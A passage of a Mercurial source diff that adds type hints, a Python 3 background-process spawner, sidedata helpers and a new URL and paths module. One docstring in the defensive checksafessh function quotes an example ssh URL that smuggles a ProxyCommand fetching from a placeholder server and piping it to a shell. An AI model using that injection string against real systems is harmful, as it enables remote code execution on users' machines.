a localized time. unixtime is seconds since the epoch, and offset is the time zone's number of seconds away from UTC. @@ -114,11 +130,13 @@ def shortdate(date=None): + # type: (Optional[hgdate]) -> bytes """turn (timestamp, tzoff) tuple into iso 8631 date.""" return datestr(date, format=b'%Y-%m-%d') def parsetimezone(s): + # type: (bytes) -> Tuple[Optional[int], bytes] """find a trailing timezone, if any, in string, and return a (offset, remainder) pair""" s = pycompat.bytestr(s) @@ -154,6 +172,7 @@ def strdate(string, format, defaults=None): + # type: (bytes, bytes, Optional[Dict[bytes, Tuple[bytes, bytes]]]) -> hgdate """parse a localized time string and return a (unixtime, offset) tuple. if the string cannot be parsed, ValueError is raised.""" if defaults is None: @@ -196,6 +215,7 @@ def parsedate(date, formats=None, bias=None): + # type: (Union[bytes, hgdate], Optional[Iterable[bytes]], Optional[Dict[bytes, bytes]]) -> hgdate """parse a localized date/time and return a (unixtime, offset) tuple. 
The date may be a "unixtime offset" string or in one of the specified @@ -221,8 +241,11 @@ bias = {} if not date: return 0, 0 - if isinstance(date, tuple) and len(date) == 2: - return date + if isinstance(date, tuple): + if len(date) == 2: + return date + else: + raise error.ProgrammingError(b"invalid date format") if not formats: formats = defaultdateformats date = date.strip() @@ -282,6 +305,7 @@ def matchdate(date): + # type: (bytes) -> Callable[[float], bool] """Return a function that matches a given date match specifier Formats include: @@ -311,10 +335,12 @@ """ def lower(date): + # type: (bytes) -> float d = {b'mb': b"1", b'd': b"1"} return parsedate(date, extendeddateformats, d)[0] def upper(date): + # type: (bytes) -> float d = {b'mb': b"12", b'HI': b"23", b'M': b"59", b'S': b"59"} for days in (b"31", b"30", b"29"): try: @@ -328,24 +354,26 @@ date = date.strip() if not date: - raise error.Abort(_(b"dates cannot consist entirely of whitespace")) + raise error.InputError( + _(b"dates cannot consist entirely of whitespace") + ) elif date[0:1] == b"<": if not date[1:]: - raise error.Abort(_(b"invalid day spec, use '<DATE'")) + raise error.InputError(_(b"invalid day spec, use '<DATE'")) when = upper(date[1:]) return lambda x: x <= when elif date[0:1] == b">": if not date[1:]: - raise error.Abort(_(b"invalid day spec, use '>DATE'")) + raise error.InputError(_(b"invalid day spec, use '>DATE'")) when = lower(date[1:]) return lambda x: x >= when elif date[0:1] == b"-": try: days = int(date[1:]) except ValueError: - raise error.Abort(_(b"invalid day spec: %s") % date[1:]) + raise error.InputError(_(b"invalid day spec: %s") % date[1:]) if days < 0: - raise error.Abort( + raise error.InputError( _(b"%s must be nonnegative (see 'hg help dates')") % date[1:] ) when = makedate()[0] - days * 3600 * 24 diff --git a/mercurial/utils/procutil.py b/mercurial/utils/procutil.py --- a/mercurial/utils/procutil.py +++ b/mercurial/utils/procutil.py @@ -1,7 +1,7 @@ # procutil.py - 
utility for managing processes and executable environment
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
 #
 # This software may be used and distributed according to the terms of the
@@ -701,7 +701,88 @@

 else:

-    def runbgcommand(
+    def runbgcommandpy3(
+        cmd,
+        env,
+        shell=False,
+        stdout=None,
+        stderr=None,
+        ensurestart=True,
+        record_wait=None,
+        stdin_bytes=None,
+    ):
+        """Spawn a command without waiting for it to finish.
+
+
+        When `record_wait` is not None, the spawned process will not be fully
+        detached and the `record_wait` argument will be called with the
+        `Subprocess.wait` function for the spawned process.  This is mostly
+        useful for developers that need to make sure the spawned process
+        finished before a certain point. (eg: writing test)"""
+        if pycompat.isdarwin:
+            # avoid crash in CoreFoundation in case another thread
+            # calls gui() while we're calling fork().
+            gui()
+
+        if shell:
+            script = cmd
+        else:
+            if isinstance(cmd, bytes):
+                cmd = [cmd]
+            script = b' '.join(shellquote(x) for x in cmd)
+        if record_wait is None:
+            # double-fork to completely detach from the parent process
+            script = b'( %s ) &' % script
+            start_new_session = True
+        else:
+            start_new_session = False
+            ensurestart = True
+
+        try:
+            if stdin_bytes is None:
+                stdin = subprocess.DEVNULL
+            else:
+                stdin = pycompat.unnamedtempfile()
+                stdin.write(stdin_bytes)
+                stdin.flush()
+                stdin.seek(0)
+            if stdout is None:
+                stdout = subprocess.DEVNULL
+            if stderr is None:
+                stderr = subprocess.DEVNULL
+
+            p = subprocess.Popen(
+                script,
+                shell=True,
+                env=env,
+                close_fds=True,
+                stdin=stdin,
+                stdout=stdout,
+                stderr=stderr,
+                start_new_session=start_new_session,
+            )
+        except Exception:
+            if record_wait is not None:
+                record_wait(255)
+            raise
+        finally:
+            if stdin_bytes is not None:
+                stdin.close()
+        if not ensurestart:
+            # Even though we're not waiting on the child process,
+            # we still must call waitpid() on it at some point so
+            # it's not a zombie/defunct. This is especially relevant for
+            # chg since the parent process won't die anytime soon.
+            # We use a thread to make the overhead tiny.
+            t = threading.Thread(target=lambda: p.wait())
+            t.daemon = True
+            t.start()
+        else:
+            returncode = p.wait()
+            if record_wait is not None:
+                record_wait(returncode)
+
+    def runbgcommandpy2(
         cmd,
         env,
         shell=False,
@@ -811,3 +892,14 @@
             stdin.close()
         if record_wait is None:
             os._exit(returncode)
+
+    if pycompat.ispy3:
+        # This branch is more robust, because it avoids running python
+        # code (hence gc finalizers, like sshpeer.__del__, which
+        # blocks). But we can't easily do the equivalent in py2,
+        # because of the lack of start_new_session=True flag. Given
+        # that the py2 branch should die soon, the short-lived
+        # duplication seems acceptable.
+ runbgcommand = runbgcommandpy3 + else: + runbgcommand = runbgcommandpy2 diff --git a/mercurial/utils/resourceutil.py b/mercurial/utils/resourceutil.py --- a/mercurial/utils/resourceutil.py +++ b/mercurial/utils/resourceutil.py @@ -1,7 +1,7 @@ # resourceutil.py - utility for looking up resources # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/utils/storageutil.py b/mercurial/utils/storageutil.py --- a/mercurial/utils/storageutil.py +++ b/mercurial/utils/storageutil.py @@ -23,6 +23,7 @@ pycompat, ) from ..interfaces import repository +from ..revlogutils import sidedata as sidedatamod from ..utils import hashutil _nullhash = hashutil.sha1(nullid) @@ -294,6 +295,7 @@ deltamode=repository.CG_DELTAMODE_STD, revisiondata=False, assumehaveparentrevisions=False, + sidedata_helpers=None, ): """Generic implementation of ifiledata.emitrevisions(). @@ -356,6 +358,21 @@ ``nodesorder`` ``revisiondata`` ``assumehaveparentrevisions`` + ``sidedata_helpers`` (optional) + If not None, means that sidedata should be included. + A dictionary of revlog type to tuples of `(repo, computers, removers)`: + * `repo` is used as an argument for computers + * `computers` is a list of `(category, (keys, computer)` that + compute the missing sidedata categories that were asked: + * `category` is the sidedata category + * `keys` are the sidedata keys to be affected + * `computer` is the function `(repo, store, rev, sidedata)` that + returns a new sidedata dict. + * `removers` will remove the keys corresponding to the categories + that are present, but not needed. + If both `computers` and `removers` are empty, sidedata are simply not + transformed. + Revlog types are `changelog`, `manifest` or `filelog`. 
""" fnode = store.node @@ -469,6 +486,17 @@ available.add(rev) + sidedata = None + if sidedata_helpers: + sidedata = store.sidedata(rev) + sidedata = run_sidedata_helpers( + store=store, + sidedata_helpers=sidedata_helpers, + sidedata=sidedata, + rev=rev, + ) + sidedata = sidedatamod.serialize_sidedata(sidedata) + yield resultcls( node=node, p1node=fnode(p1rev), @@ -478,11 +506,31 @@ baserevisionsize=baserevisionsize, revision=revision, delta=delta, + sidedata=sidedata, ) prevrev = rev +def run_sidedata_helpers(store, sidedata_helpers, sidedata, rev): + """Returns the sidedata for the given revision after running through + the given helpers. + - `store`: the revlog this applies to (changelog, manifest, or filelog + instance) + - `sidedata_helpers`: see `storageutil.emitrevisions` + - `sidedata`: previous sidedata at the given rev, if any + - `rev`: affected rev of `store` + """ + repo, sd_computers, sd_removers = sidedata_helpers + kind = store.revlog_kind + for _keys, sd_computer in sd_computers.get(kind, []): + sidedata = sd_computer(repo, store, rev, sidedata) + for keys, _computer in sd_removers.get(kind, []): + for key in keys: + sidedata.pop(key, None) + return sidedata + + def deltaiscensored(delta, baserev, baselenfn): """Determine if a delta represents censored revision data. diff --git a/mercurial/utils/stringutil.py b/mercurial/utils/stringutil.py --- a/mercurial/utils/stringutil.py +++ b/mercurial/utils/stringutil.py @@ -1,7 +1,7 @@ # stringutil.py - utility for generic string formatting, parsing, etc. # # Copyright 2005 K. 
Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py new file mode 100644 --- /dev/null +++ b/mercurial/utils/urlutil.py @@ -0,0 +1,792 @@ +# utils.urlutil - code related to [paths] management +# +# Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others +# +# This software may be used and distributed according to the terms of the +# GNU General Public License version 2 or any later version. +import os +import re as remod +import socket + +from ..i18n import _ +from ..pycompat import ( + getattr, + setattr, +) +from .. import ( + encoding, + error, + pycompat, + urllibcompat, +) + + +if pycompat.TYPE_CHECKING: + from typing import ( + Union, + ) + +urlreq = urllibcompat.urlreq + + +def getport(port): + # type: (Union[bytes, int]) -> int + """Return the port for a given network service. + + If port is an integer, it's returned as is. If it's a string, it's + looked up using socket.getservbyname(). If there's no matching + service, error.Abort is raised. + """ + try: + return int(port) + except ValueError: + pass + + try: + return socket.getservbyname(pycompat.sysstr(port)) + except socket.error: + raise error.Abort( + _(b"no port number associated with service '%s'") % port + ) + + +class url(object): + r"""Reliable URL parser. + + This parses URLs and provides attributes for the following + components: + + <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> + + Missing components are set to None. The only exception is + fragment, which is set to '' if present but empty. + + If parsefragment is False, fragment is included in query. If + parsequery is False, query is included in path. If both are + False, both fragment and query are included in path. 
+ + See http://www.ietf.org/rfc/rfc2396.txt for more information. + + Note that for backward compatibility reasons, bundle URLs do not + take host names. That means 'bundle://../' has a path of '../'. + + Examples: + + >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') + <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> + >>> url(b'ssh://[::1]:2200//home/joe/repo') + <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> + >>> url(b'file:///home/joe/repo') + <url scheme: 'file', path: '/home/joe/repo'> + >>> url(b'file:///c:/temp/foo/') + <url scheme: 'file', path: 'c:/temp/foo/'> + >>> url(b'bundle:foo') + <url scheme: 'bundle', path: 'foo'> + >>> url(b'bundle://../foo') + <url scheme: 'bundle', path: '../foo'> + >>> url(br'c:\foo\bar') + <url path: 'c:\\foo\\bar'> + >>> url(br'\\blah\blah\blah') + <url path: '\\\\blah\\blah\\blah'> + >>> url(br'\\blah\blah\blah#baz') + <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> + >>> url(br'file:///C:\users\me') + <url scheme: 'file', path: 'C:\\users\\me'> + + Authentication credentials: + + >>> url(b'ssh://joe:xyz@x/repo') + <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> + >>> url(b'ssh://joe@x/repo') + <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> + + Query strings and fragments: + + >>> url(b'http://host/a?b#c') + <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> + >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) + <url scheme: 'http', host: 'host', path: 'a?b#c'> + + Empty path: + + >>> url(b'') + <url path: ''> + >>> url(b'#a') + <url path: '', fragment: 'a'> + >>> url(b'http://host/') + <url scheme: 'http', host: 'host', path: ''> + >>> url(b'http://host/#a') + <url scheme: 'http', host: 'host', path: '', fragment: 'a'> + + Only scheme: + + >>> url(b'http:') + <url scheme: 'http'> + """ + + _safechars = b"!~*'()+" + _safepchars = b"/!~*'()+:\\" + _matchscheme = 
remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match + + def __init__(self, path, parsequery=True, parsefragment=True): + # type: (bytes, bool, bool) -> None + # We slowly chomp away at path until we have only the path left + self.scheme = self.user = self.passwd = self.host = None + self.port = self.path = self.query = self.fragment = None + self._localpath = True + self._hostport = b'' + self._origpath = path + + if parsefragment and b'#' in path: + path, self.fragment = path.split(b'#', 1) + + # special case for Windows drive letters and UNC paths + if hasdriveletter(path) or path.startswith(b'\\\\'): + self.path = path + return + + # For compatibility reasons, we can't handle bundle paths as + # normal URLS + if path.startswith(b'bundle:'): + self.scheme = b'bundle' + path = path[7:] + if path.startswith(b'//'): + path = path[2:] + self.path = path + return + + if self._matchscheme(path): + parts = path.split(b':', 1) + if parts[0]: + self.scheme, path = parts + self._localpath = False + + if not path: + path = None + if self._localpath: + self.path = b'' + return + else: + if self._localpath: + self.path = path + return + + if parsequery and b'?' 
in path: + path, self.query = path.split(b'?', 1) + if not path: + path = None + if not self.query: + self.query = None + + # // is required to specify a host/authority + if path and path.startswith(b'//'): + parts = path[2:].split(b'/', 1) + if len(parts) > 1: + self.host, path = parts + else: + self.host = parts[0] + path = None + if not self.host: + self.host = None + # path of file:///d is /d + # path of file:///d:/ is d:/, not /d:/ + if path and not hasdriveletter(path): + path = b'/' + path + + if self.host and b'@' in self.host: + self.user, self.host = self.host.rsplit(b'@', 1) + if b':' in self.user: + self.user, self.passwd = self.user.split(b':', 1) + if not self.host: + self.host = None + + # Don't split on colons in IPv6 addresses without ports + if ( + self.host + and b':' in self.host + and not ( + self.host.startswith(b'[') and self.host.endswith(b']') + ) + ): + self._hostport = self.host + self.host, self.port = self.host.rsplit(b':', 1) + if not self.host: + self.host = None + + if ( + self.host + and self.scheme == b'file' + and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') + ): + raise error.Abort( + _(b'file:// URLs can only refer to localhost') + ) + + self.path = path + + # leave the query string escaped + for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): + v = getattr(self, a) + if v is not None: + setattr(self, a, urlreq.unquote(v)) + + def copy(self): + u = url(b'temporary useless value') + u.path = self.path + u.scheme = self.scheme + u.user = self.user + u.passwd = self.passwd + u.host = self.host + u.path = self.path + u.query = self.query + u.fragment = self.fragment + u._localpath = self._localpath + u._hostport = self._hostport + u._origpath = self._origpath + return u + + @encoding.strmethod + def __repr__(self): + attrs = [] + for a in ( + b'scheme', + b'user', + b'passwd', + b'host', + b'port', + b'path', + b'query', + b'fragment', + ): + v = getattr(self, a) + if v is not None: + attrs.append(b'%s: 
%r' % (a, pycompat.bytestr(v))) + return b'<url %s>' % b', '.join(attrs) + + def __bytes__(self): + r"""Join the URL's components back into a URL string. + + Examples: + + >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) + 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) + 'http://user:pw@host:80/?foo=bar&baz=42' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) + 'http://user:pw@host:80/?foo=bar%3dbaz' + >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) + 'ssh://user:pw@[::1]:2200//home/joe#' + >>> bytes(url(b'http://localhost:80//')) + 'http://localhost:80//' + >>> bytes(url(b'http://localhost:80/')) + 'http://localhost:80/' + >>> bytes(url(b'http://localhost:80')) + 'http://localhost:80/' + >>> bytes(url(b'bundle:foo')) + 'bundle:foo' + >>> bytes(url(b'bundle://../foo')) + 'bundle:../foo' + >>> bytes(url(b'path')) + 'path' + >>> bytes(url(b'file:///tmp/foo/bar')) + 'file:///tmp/foo/bar' + >>> bytes(url(b'file:///c:/tmp/foo/bar')) + 'file:///c:/tmp/foo/bar' + >>> print(url(br'bundle:foo\bar')) + bundle:foo\bar + >>> print(url(br'file:///D:\data\hg')) + file:///D:\data\hg + """ + if self._localpath: + s = self.path + if self.scheme == b'bundle': + s = b'bundle:' + s + if self.fragment: + s += b'#' + self.fragment + return s + + s = self.scheme + b':' + if self.user or self.passwd or self.host: + s += b'//' + elif self.scheme and ( + not self.path + or self.path.startswith(b'/') + or hasdriveletter(self.path) + ): + s += b'//' + if hasdriveletter(self.path): + s += b'/' + if self.user: + s += urlreq.quote(self.user, safe=self._safechars) + if self.passwd: + s += b':' + urlreq.quote(self.passwd, safe=self._safechars) + if self.user or self.passwd: + s += b'@' + if self.host: + if not (self.host.startswith(b'[') and self.host.endswith(b']')): + s += urlreq.quote(self.host) + else: + s += self.host + if self.port: + s += b':' + urlreq.quote(self.port) + if self.host: + s += b'/' + if 
self.path: + # TODO: similar to the query string, we should not unescape the + # path when we store it, the path might contain '%2f' = '/', + # which we should *not* escape. + s += urlreq.quote(self.path, safe=self._safepchars) + if self.query: + # we store the query in escaped form. + s += b'?' + self.query + if self.fragment is not None: + s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) + return s + + __str__ = encoding.strmethod(__bytes__) + + def authinfo(self): + user, passwd = self.user, self.passwd + try: + self.user, self.passwd = None, None + s = bytes(self) + finally: + self.user, self.passwd = user, passwd + if not self.user: + return (s, None) + # authinfo[1] is passed to urllib2 password manager, and its + # URIs must not contain credentials. The host is passed in the + # URIs list because Python < 2.4.3 uses only that to search for + # a password. + return (s, (None, (s, self.host), self.user, self.passwd or b'')) + + def isabs(self): + if self.scheme and self.scheme != b'file': + return True # remote URL + if hasdriveletter(self.path): + return True # absolute for our purposes - can't be joined() + if self.path.startswith(br'\\'): + return True # Windows UNC path + if self.path.startswith(b'/'): + return True # POSIX-style + return False + + def localpath(self): + # type: () -> bytes + if self.scheme == b'file' or self.scheme == b'bundle': + path = self.path or b'/' + # For Windows, we need to promote hosts containing drive + # letters to paths with drive letters. 
+ if hasdriveletter(self._hostport): + path = self._hostport + b'/' + self.path + elif ( + self.host is not None and self.path and not hasdriveletter(path) + ): + path = b'/' + path + return path + return self._origpath + + def islocal(self): + '''whether localpath will return something that posixfile can open''' + return ( + not self.scheme + or self.scheme == b'file' + or self.scheme == b'bundle' + ) + + +def hasscheme(path): + # type: (bytes) -> bool + return bool(url(path).scheme) # cast to help pytype + + +def hasdriveletter(path): + # type: (bytes) -> bool + return bool(path) and path[1:2] == b':' and path[0:1].isalpha() + + +def urllocalpath(path): + # type: (bytes) -> bytes + return url(path, parsequery=False, parsefragment=False).localpath() + + +def checksafessh(path): + # type: (bytes) -> None + """check if a path / url is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. 
+ """ + path = urlreq.unquote(path) + if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): + raise error.Abort( + _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) + ) + + +def hidepassword(u): + # type: (bytes) -> bytes + '''hide user credential in a url string''' + u = url(u) + if u.passwd: + u.passwd = b'***' + return bytes(u) + + +def removeauth(u): + # type: (bytes) -> bytes + '''remove all authentication information from a url string''' + u = url(u) + u.user = u.passwd = None + return bytes(u) + + +def get_push_paths(repo, ui, dests): + """yields all the `path` selected as push destination by `dests`""" + if not dests: + if b'default-push' in ui.paths: + yield ui.paths[b'default-push'] + elif b'default' in ui.paths: + yield ui.paths[b'default'] + else: + raise error.ConfigError( + _(b'default repository not configured!'), + hint=_(b"see 'hg help config.paths'"), + ) + else: + for dest in dests: + yield ui.getpath(dest) + + +def get_pull_paths(repo, ui, sources, default_branches=()): + """yields all the `(path, branch)` selected as pull source by `sources`""" + if not sources: + sources = [b'default'] + for source in sources: + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source + yield parseurl(url, default_branches) + + +def get_unique_push_path(action, repo, ui, dest=None): + """return a unique `path` or abort if multiple are found + + This is useful for command and action that does not support multiple + destination (yet). + + Note that for now, we cannot get multiple destination so this function is "trivial". + + The `action` parameter will be used for the error message. 
+ """ + if dest is None: + dests = [] + else: + dests = [dest] + dests = list(get_push_paths(repo, ui, dests)) + assert len(dests) == 1 + return dests[0] + + +def get_unique_pull_path(action, repo, ui, source=None, default_branches=()): + """return a unique `(path, branch)` or abort if multiple are found + + This is useful for command and action that does not support multiple + destination (yet). + + Note that for now, we cannot get multiple destination so this function is "trivial". + + The `action` parameter will be used for the error message. + """ + if source is None: + if b'default' in ui.paths: + url = ui.paths[b'default'].rawloc + else: + # XXX this is the historical default behavior, but that is not + # great, consider breaking BC on this. + url = b'default' + else: + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source + return parseurl(url, default_branches) + + +def get_clone_path(ui, source, default_branches=()): + """return the `(origsource, path, branch)` selected as clone source""" + if source is None: + if b'default' in ui.paths: + url = ui.paths[b'default'].rawloc + else: + # XXX this is the historical default behavior, but that is not + # great, consider breaking BC on this. + url = b'default' + else: + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. 
+ try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source + clone_path, branch = parseurl(url, default_branches) + return url, clone_path, branch + + +def parseurl(path, branches=None): + '''parse url#branch, returning (url, (branch, branches))''' + u = url(path) + branch = None + if u.fragment: + branch = u.fragment + u.fragment = None + return bytes(u), (branch, branches or []) + + +class paths(dict): + """Represents a collection of paths and their configs. + + Data is initially derived from ui instances and the config files they have + loaded. + """ + + def __init__(self, ui): + dict.__init__(self) + + for name, loc in ui.configitems(b'paths', ignoresub=True): + # No location is the same as not existing. + if not loc: + continue + loc, sub_opts = ui.configsuboptions(b'paths', name) + self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) + + for name, p in sorted(self.items()): + p.chain_path(ui, self) + + def getpath(self, ui, name, default=None): + """Return a ``path`` from a string, falling back to default. + + ``name`` can be a named path or locations. Locations are filesystem + paths or URIs. + + Returns None if ``name`` is not a registered path, a URI, or a local + path to a repo. + """ + # Only fall back to default if no path was requested. + if name is None: + if not default: + default = () + elif not isinstance(default, (tuple, list)): + default = (default,) + for k in default: + try: + return self[k] + except KeyError: + continue + return None + + # Most likely empty string. + # This may need to raise in the future. + if not name: + return None + + try: + return self[name] + except KeyError: + # Try to resolve as a local path or URI. 
+ try: + # we pass the ui instance are warning might need to be issued + return path(ui, None, rawloc=name) + except ValueError: + raise error.RepoError(_(b'repository %s does not exist') % name) + + +_pathsuboptions = {} + + +def pathsuboption(option, attr): + """Decorator used to declare a path sub-option. + + Arguments are the sub-option name and the attribute it should set on + ``path`` instances. + + The decorated function will receive as arguments a ``ui`` instance, + ``path`` instance, and the string value of this option from the config. + The function should return the value that will be set on the ``path`` + instance. + + This decorator can be used to perform additional verification of + sub-options and to change the type of sub-options. + """ + + def register(func): + _pathsuboptions[option] = (attr, func) + return func + + return register + + +@pathsuboption(b'pushurl', b'pushloc') +def pushurlpathoption(ui, path, value): + u = url(value) + # Actually require a URL. + if not u.scheme: + ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) + return None + + # Don't support the #foo syntax in the push URL to declare branch to + # push. + if u.fragment: + ui.warn( + _( + b'("#fragment" in paths.%s:pushurl not supported; ' + b'ignoring)\n' + ) + % path.name + ) + u.fragment = None + + return bytes(u) + + +@pathsuboption(b'pushrev', b'pushrev') +def pushrevpathoption(ui, path, value): + return value + + +class path(object): + """Represents an individual path and its configuration.""" + + def __init__(self, ui, name, rawloc=None, suboptions=None): + """Construct a path from its config options. + + ``ui`` is the ``ui`` instance the path is coming from. + ``name`` is the symbolic name of the path. + ``rawloc`` is the raw location, as defined in the config. + ``pushloc`` is the raw locations pushes should be made to. + + If ``name`` is not defined, we require that the location be a) a local + filesystem path with a .hg directory or b) a URL. 
If not, + ``ValueError`` is raised. + """ + if not rawloc: + raise ValueError(b'rawloc must be defined') + + # Locations may define branches via syntax <base>#<branch>. + u = url(rawloc) + branch = None + if u.fragment: + branch = u.fragment + u.fragment = None + + self.url = u + # the url from the config/command line before dealing with `path://` + self.raw_url = u.copy() + self.branch = branch + + self.name = name + self.rawloc = rawloc + self.loc = b'%s' % u + + self._validate_path() + + _path, sub_opts = ui.configsuboptions(b'paths', b'*') + self._own_sub_opts = {} + if suboptions is not None: + self._own_sub_opts = suboptions.copy() + sub_opts.update(suboptions) + self._all_sub_opts = sub_opts.copy() + + self._apply_suboptions(ui, sub_opts) + + def chain_path(self, ui, paths): + if self.url.scheme == b'path': + assert self.url.path is None + try: + subpath = paths[self.url.host] + except KeyError: + m = _(b'cannot use `%s`, "%s" is not a known path') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) + if subpath.raw_url.scheme == b'path': + m = _(b'cannot use `%s`, "%s" is also defined as a `path://`') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) + self.url = subpath.url + self.rawloc = subpath.rawloc + self.loc = subpath.loc + if self.branch is None: + self.branch = subpath.branch + else: + base = self.rawloc.rsplit(b'#', 1)[0] + self.rawloc = b'%s#%s' % (base, self.branch) + suboptions = subpath._all_sub_opts.copy() + suboptions.update(self._own_sub_opts) + self._apply_suboptions(ui, suboptions) + + def _validate_path(self): + # When given a raw location but not a symbolic name, validate the + # location is valid. + if ( + not self.name + and not self.url.scheme + and not self._isvalidlocalpath(self.loc) + ): + raise ValueError( + b'location is not a URL or path to a local ' + b'repo: %s' % self.rawloc + ) + + def _apply_suboptions(self, ui, sub_options): + # Now process the sub-options. 
If a sub-option is registered, its + # attribute will always be present. The value will be None if there + # was no valid sub-option. + for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): + if suboption not in sub_options: + setattr(self, attr, None) + continue + + value = func(ui, self, sub_options[suboption]) + setattr(self, attr, value) + + def _isvalidlocalpath(self, path): + """Returns True if the given path is a potentially valid repository. + This is its own function so that extensions can change the definition of + 'valid' in this case (like when pulling from a git repo into a hg + one).""" + try: + return os.path.isdir(os.path.join(path, b'.hg')) + # Python 2 may return TypeError. Python 3, ValueError. + except (TypeError, ValueError): + return False + + @property + def suboptions(self): + """Return sub-options and their values for this path. + + This is intended to be used for presentation purposes. + """ + d = {} + for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions): + value = getattr(self, attr) + if value is not None: + d[subopt] = value + return d diff --git a/mercurial/verify.py b/mercurial/verify.py --- a/mercurial/verify.py +++ b/mercurial/verify.py @@ -1,6 +1,6 @@ # verify.py - repository integrity checking for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -416,7 +416,7 @@ storefiles = set() subdirs = set() revlogv1 = self.revlogv1 - for f, f2, size in repo.store.datafiles(): + for t, f, f2, size in repo.store.datafiles(): if not f: self._err(None, _(b"cannot decode filename '%s'") % f2) elif (size > 0 or not revlogv1) and f.startswith(b'meta/'): @@ -480,7 +480,7 @@ ui.status(_(b"checking files\n")) storefiles = set() - for f, f2, size in repo.store.datafiles(): + for rl_type, f, f2, size in repo.store.datafiles(): if not f: self._err(None, _(b"cannot decode filename '%s'") % f2) elif (size > 0 or not revlogv1) and f.startswith(b'data/'): diff --git a/mercurial/vfs.py b/mercurial/vfs.py --- a/mercurial/vfs.py +++ b/mercurial/vfs.py @@ -1,6 +1,6 @@ # vfs.py - Mercurial 'vfs' classes # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/win32.py b/mercurial/win32.py --- a/mercurial/win32.py +++ b/mercurial/win32.py @@ -1,6 +1,6 @@ # win32.py - utility functions that use win32 API # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/windows.py b/mercurial/windows.py --- a/mercurial/windows.py +++ b/mercurial/windows.py @@ -1,6 +1,6 @@ # windows.py - Windows utility function implementations for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
